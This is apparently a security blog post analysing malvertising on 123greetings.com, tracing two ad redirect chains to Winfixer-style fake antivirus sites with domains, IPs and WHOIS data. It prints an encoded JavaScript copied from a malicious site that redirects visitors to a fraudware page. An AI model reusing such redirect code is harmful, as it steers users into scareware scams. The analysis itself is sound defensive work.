Malicious content appearing on 123greetings.com as discovered by seo.mhvt.com

This incident was originally reported on by seo.mhvt.com.  seo.mhvt.com apparently reported the incident to 123greetings.com, but to no avail.  I tried to get in touch with the gentleman behind seo.mhvt.com nearly 24 hours ago to see if he wanted to use the following information on his blog, but sadly he seems to be offline and hasn't been able to respond, so let's get this live, with all credit to Tom for the discovery of a hijack at 123greetings.com.

Ok, so let's take a look and see if we can help out with getting the advertisements shut down.  As always, we will work backwards from the fraudware site that is the final destination.  But first, let's look at the malicious advertisements that are causing problems at 123greetings.com:

One problem is a malicious advertisement touting dottunes.com (again) - note the RealMedia URL - we'll talk more about that later in the article.  Another problem is a malicious pop-up.

I have reported both campaigns to my contacts at RealMedia; the first was shut down just one hour and 8 minutes later, the second (the popup) took a little longer to identify but has also been suspended.

Here is a screenshot of the malicious advertisement in situ:

 

Here is a shot of the malicious pop-up advertisement:

Now, let's have a look at exactly what happened, as always, working backwards - I'm going to do something a little different this time, and include deeper information that technicians may find interesting.

Hijack Number 1 at 123greetings.com - the dottunes advertisement

The final target fraudware site:

scanner2.malware-scan.com/5_swp/?tmn=null&aid=dulcineano&lid=intl&affid=&ax=0&ed=2&aid=dulcineano_ma5_mb1&lid=
intl&affid=&ax=&ed=&mt_info=3958_0_11469

We also see:

prevedmarketing.com/?tmn=mwatmp&poa=dulcineano&pol=intl&apo=0&epo=1&edpo=2&mt_info=5166_3721_12669  (IP 190.15.73.254)

blessedads.com/?cmpid=dulcineano&adid=intl (IP 190.15.73.254)

thetechnorati.com/statss.php?campaign=dulcineano&u=1198232629 (IP 64.38.4.134 - abusive behaviour reported to IP owners, FastServers)

All of the above have the same referrer:
thetechnorati.com/swf/gnida.swf?campaign=dulcineano&u=1198232629  (IP 64.38.4.134)

-----

thetechnorati.com/swf/gnida.swf?campaign=dulcineano&u=1198232629

Referrer:
thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano

-----

thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano

Referrer:
thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano

-----
thetechnorati.com/statsa.php?u=1198232629&campaign=dulcineano

Referrer:
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ForceUp_LB_10661A/dottunes_728x90.swf?clickTAG=http: // oascentral.123greetings.com/RealMedia/ads/click_lx.ads/123greetings.com/home/home/L26/277614549/Top/123Greet/ForceUp_LB_
10661A/ForceUp_LB_10661A.html/4f714855755565494477494141645076?http: // www.dottunes.net/?ref=123000

------

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ForceUp_LB_10661A/dottunes_728x90.swf?clickTAG=http: // oascentral.123greetings.com/RealMedia/ads/click_lx.ads/123greetings.com/home/home/L26/277614549/Top/123Greet/ForceUp_LB_10661A/ForceUp_LB_10661A.html/4f714855755565494477494141645076?http: // www.dottunes.net/?ref=123000

Referrer:
www.123greetings.com/

As noted at the beginning of the article, the malicious advertisement featuring dot.tunes has been suspended.

Hijack Number 2 at 123greetings.com - the popup

Another bad guy that appears in the 123greetings.com network capture is a popup that redirects to a classic Winfixer site:

excursionglobe.com/?ref=e3&aff=x3

But where did the popup come from?  I searched the network capture for the text “excursionglobe” and came up with 5 hits, working backwards:

1. excursionglobe.com/code/print.php
2. excursionglobe.com/?ref=e3&aff=x3 (this is the URL of the actual popup)
3. toolbarqueries.google.com/search?client=navclient-auto&ch=62435547374&ie=UTF-8&oe=UTF-8&features=Rank&q=info:http%3A//www . excursionglobe.com/%3Fref%3De3%26aff%3Dx3
4. xml.alexa.com/data?cli=10&dat=nsa&ver=quirk-searchstatus&uid=20060101000000&userip=126.12.3.4&url=www.excursionglobe.com
5. oascentral.123greetings.com/RealMedia/ads/adstream_mjx.ads/123greetings.com/home/home/1805849198@Top,x01?q1=home&page=home

Ok, so RealMedia is the first session where excursionglobe appears.  We take a closer look at that particular session, and discover document.write code referencing the 2nd excursionglobe URL (the actual popup URL)

The excursionglobe.com web site includes a couple of scripts viewable via View Source (make sure you add excursionglobe.com to IE's Restricted Sites zone to stop the redirect from triggering).   This code immediately redirects a victim to the winerrorfixer site, often before the content of the excursionglobe page even loads.

For example, look at this script (copied from the excursionglobe site - as you can see, it is encoded):

%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%20%76%61%72%20%69%3b%20%76%61%72%20%7a%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%20%20%76%61%72%20%64%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b%20%76%61%72%20%67%6d%74%48%6f%75%72%73%20%3d%20%64%2e%67%65%74%54%69%6d%65%7a%6f%6e%65%4f%66%66%73%65%74%28%29%2f%36%30%3b%76%61%72%20%72%65%64%20%3d%20%30%3b%20%66%6f%72%20%28%69%20%69%6e%20%7a%29%20%69%66%20%28%7a%5b%69%5d%20%3d%3d%20%67%6d%74%48%6f%75%72%73%29%20%20%72%65%64%20%3d%20%32%33%3b%20%69%66%20%28%72%65%64%20%21%3d%20%32%33%29%20%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%77%77%77%31%2e%77%69%6e%65%72%72%6f%72%66%69%78%65%72%2e%63%6f%6d%3f%73%69%74%65%5f%69%64%3d%57%45%46%26%72%65%66%3d%67%72%26%61%66%66%3d%74%6e%26%70%31%3d%31%26%70%32%3d%31%26%70%31%63%3d%30%26%70%32%63%3d%30%26%63%3d%31%22%3b%3c%2f%73%63%72%69%70%74%3e

The encoding took only a second or two or decode.  Once we have done that, we can see the following: 

Yep, excursionglobe.com is nothing more than a front for the Winfixer crowd.

The attempts to install Winfixer that were triggered by the excursionglobe popup were nothing if not persistent.

We start with this:

If you ever see a notice like the above, click on the X (don't touch the OK or Cancel buttons pictured above).  I clicked on the X and still ended up at the page below - note that the page is trying to install an ActiveX control:

We try to close the above page, we see this:

Ok, let's hit the X again - don't touch the OK or Cancel buttons pictured above:

FOR HEAVENS SAKE GO AWAY!!!!  Ok, once more, click on the Red X - don't touch the OK button pictured above.  Now what will we see?

Damn it, another page, this time trying to download "files".  Persistent little bastards, aren't they.

Ok, so we click the Red X one more time, and finally the attempted installations go away.

Technical stuff...

Info re scanner2.malware-scan.com

IP: 77.91.229.104 (WEBALTA / Internet Search Company Moscow, Russia)

Side note: some other domains hosted on 77.91.229.* include malware-scan, webspyshield, malwarealarms and spyshredderscanner.

Now, how is *this* for redundancy - the scanner2.malware-scan.com name servers are all over the world:

NameServer: NS-PRI.RIPE.NET (193.0.0.195)
NameServer: SEC1.APNIC.NET (202.12.29.59 - APNIC Pty Ltd, Brisbane Australia)
NameServer: SEC3.APNIC.NET (202.12.28.140 - APNIC Pty Ltd, Brisbane Australia)
NameServer: TINNIE.ARIN.NET (168.143.101.18 - American Registry for Internet Numbers, Chantilly, US)
NameServer: NS.LACNIC.NET (200.160.0.7 - Latin American and Caribbean IP address Regional Registry, Mexico)
NameServer: SUNIC.SUNET.SE (192.36.125.2 - Sweden)

Info re thetechnorati.com

This is interesting - whois.yesnic.com is refusing name search:
whois -h whois.yesnic.com thetechnorati.com ... failed, couldn't connect to host: Connection refused (WSAECONNREFUSED)

That being said, we can trace the IP back to Hanaro Telecom Inc Yeoeuido dong Yeongdeungpo gu SEOUL.

yesnic.com (IP 211.245.23.50)

IP: 64.38.4.134 (FastServers, Inc.)

Name Server: NS1.THETECHNORATI.COM (208.79.82.50 - Tranquil Hosting, Inc, USA)
Name Server: NS2.THETECHNORATI.COM (208.79.82.66 - Tranquil Hosting, Inc, USA)
Name Server: NS3.THETECHNORATI.COM (77.73.98.2 - NUCLEUS BVBA, Belgium)
Name Server: NS4.THETECHNORATI.COM (77.73.98.4 - NUCLEUS BVBA, Belgium)

There are a lot of well known, bad, names on the first nameserver -
http://registrar.verisign-grs.com/cgi-bin/whois?whois_nic=208.79.82.50&type=nameserver&x=32&y=6

And the third:
http://registrar.verisign-grs.com/cgi-bin/whois?whois_nic=77.73.98.2&type=nameserver&whois_tld=Whois+TLD&x=14&y=4

Other domains hosted on 208.79.82.* include advancedcleaner, akamahi, antispywaresuite, antiviruspcsuite, bestsellerantivirus, securepccleaner, spyguardpro, storageprotector, systemdoctor and vozemiliogaranon.

Other domains that use name server 208.79.82.* include advancedcleaner, akamahi, antispywaresuite, antiviruspcsuite, bestsellerantivirus, errorsafe, securepccleaner,spyguardpro, storageprotector, systemdoctor, the technorati and vozemiliogaranon

Info re excursionglobe.com

excursionglobe.com (IP 203.211.136.222 - WHOIS Mike Beket, 2057 Orchard Street Apt B, Urbana, Illinois 61801, USA)

Host: QALA SG AP QALA Singapore Pte Ltd 10 Science Park Road The Alpha Singapore Science Park II Singapore 117684.

Name servers: 208.109.78.191, 208.109.255.20 (GoDaddy com, Inc LLNW cust Go Daddy Software Route for Digidefense com)